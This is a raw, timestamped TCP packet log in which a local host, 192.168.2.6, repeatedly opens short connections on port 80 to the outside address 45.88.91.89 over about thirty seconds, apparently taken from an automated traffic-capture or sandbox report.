                                                      Dec 13, 2024 14:33:20.555598021 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.555727959 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.555763960 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:20.555818081 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:20.555969000 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:20.675633907 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.909411907 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:21.029448032 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:21.029521942 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:21.029551983 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:21.642539978 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:21.735420942 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:21.881769896 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.021836996 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.022106886 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.141976118 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.142131090 CET804988645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.142218113 CET4988680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.142271996 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.142391920 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.262192965 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.500850916 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:22.620774031 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.620840073 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:22.620871067 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:23.227137089 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:23.460975885 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:23.461075068 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.619889021 CET4989480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.619940042 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.739835024 CET804989445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:23.740108013 CET4989480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.740164042 CET804988945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:23.740291119 CET4988980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.776990891 CET4989480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:23.897250891 CET804989445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.049091101 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.049340963 CET4989480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.171324015 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.171387911 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.171540022 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.214385986 CET804989445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.291400909 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.516482115 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.632169008 CET804989445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.632288933 CET4989480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:24.636385918 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.636399031 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:24.636430025 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:25.269495964 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:25.344485044 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.505440950 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:25.640038013 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.640464067 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.760467052 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:25.760544062 CET804989545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:25.760576010 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.760622025 CET4989580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.760771036 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:25.880490065 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:26.110188961 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:26.230132103 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:26.230161905 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:26.230184078 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:26.868753910 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.048131943 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.100920916 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.232683897 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.232991934 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.353029013 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.353046894 CET804990145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.353121042 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.353178024 CET4990180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.353370905 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.473054886 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.704041958 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:27.823875904 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.823908091 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:27.823975086 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:28.439193010 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:28.547714949 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.677053928 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:28.735120058 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.799845934 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.800314903 CET4990880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.920033932 CET804990645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:28.920059919 CET804990845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:28.920139074 CET4990680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.920228958 CET4990880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:28.920383930 CET4990880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.040288925 CET804990845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.175587893 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.177371025 CET4990880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.296123028 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.296298981 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.341135025 CET804990845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.399883986 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.519602060 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.751050949 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.811005116 CET804990845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.811058998 CET4990880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.856169939 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.870846033 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.870954990 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.976089001 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:29.976200104 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:29.976506948 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:30.096185923 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.330091953 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:30.383423090 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.450061083 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.450077057 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.450088978 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.547753096 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:30.621428013 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:30.735570908 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.061721087 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.235126972 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.376888037 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.498214006 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.498213053 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.499264002 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.619556904 CET804990945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.619620085 CET804991445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.619668961 CET4991480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.619720936 CET4990980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.619854927 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.619935989 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.620101929 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:31.739753962 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:31.969547033 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:32.089399099 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:32.089416981 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:32.089479923 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:32.729222059 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:32.844489098 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:32.965502977 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.047697067 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.093194962 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.093540907 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213341951 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.213484049 CET804991745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.213609934 CET4991780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213620901 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.213720083 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.333523035 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.563359976 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:33.683166027 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.683222055 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:33.683238029 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.299746037 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.469577074 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.564147949 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.672620058 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.688219070 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.688379049 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808186054 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.808258057 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808398008 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.808583975 CET804992345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:34.808670998 CET4992380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:34.928457022 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.157095909 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.277348995 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.277370930 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.277393103 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.626462936 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.626688957 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.746356964 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.746444941 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.746550083 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.747092962 CET804992845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.747148037 CET4992880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.748424053 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.866276026 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.868138075 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:35.868208885 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.868380070 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:35.988337040 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.094605923 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.215913057 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.216166019 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.219671965 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.340291023 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.340306044 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.340317011 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.832726955 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:36.875752926 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:36.953609943 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.065953970 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.110121012 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.110615015 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.189125061 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.266379118 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312259912 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312356949 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.312623978 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432559013 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.432584047 CET804993045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.432671070 CET4993080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432735920 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.432826042 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.433168888 CET804993145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.433219910 CET4993180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.552561998 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.782176971 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:37.902075052 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.902091026 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:37.902118921 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.575155020 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.625750065 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.809088945 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:38.863241911 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.947113991 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:38.947361946 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067075014 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.067174911 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067250013 CET804993645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.067308903 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.067327976 CET4993680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.187144041 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.422705889 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:39.542742014 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.542768002 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:39.542781115 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.153320074 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.205425024 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.393306971 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.438241005 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.512742043 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.512784004 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632574081 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.632658958 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632817030 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.632982016 CET804994245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.633059978 CET4994280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:40.752551079 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:40.985248089 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:41.105133057 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.105155945 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.105269909 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.723052025 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:41.766377926 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:41.957170010 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.000771999 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.079401016 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.079696894 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.087826967 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.093044043 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.093092918 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199465990 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.199568987 CET804994545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.199589014 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199630022 CET4994580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.199922085 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.207631111 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.207712889 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.207834959 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.321171045 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.327481031 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.547827005 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.563332081 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:42.667789936 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.667810917 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683419943 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683440924 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:42.683454037 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.287892103 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.293193102 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.328860998 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.344494104 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.522574902 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.525846958 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.526324034 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.526381016 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.578852892 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.646220922 CET804995245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.649436951 CET4995280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.653067112 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.653115034 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773149014 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.773395061 CET804995145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:43.773480892 CET4995180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773684978 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.773684978 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:43.893623114 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.125982046 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:44.245964050 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.245980978 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.245992899 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:44.955610991 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.000783920 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.189002037 CET804995745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.235174894 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.309746027 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.429594040 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.429838896 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.429943085 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.549700022 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.782121897 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:45.902069092 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.902100086 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:45.902146101 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.515322924 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.556598902 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.749064922 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.797635078 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.874211073 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.875102997 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.994416952 CET804996245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.994812012 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:46.994906902 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.994909048 CET4996280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:46.995266914 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:47.114914894 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.344631910 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:47.465749979 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.465903044 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:47.466053963 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.091969013 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.141386032 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.313396931 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.360129118 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.432476997 CET4995780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.435719013 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.436455965 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.533935070 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.555752039 CET804996545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.555821896 CET4996580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.556186914 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.556263924 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.556397915 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.653819084 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.654017925 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.654072046 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:48.676112890 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.776227951 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:48.907146931 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.000854969 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.027081966 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.027106047 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.027141094 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.120649099 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.120915890 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.642421007 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.688276052 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.742472887 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.797727108 CET4997280192.168.2.645.88.91.89
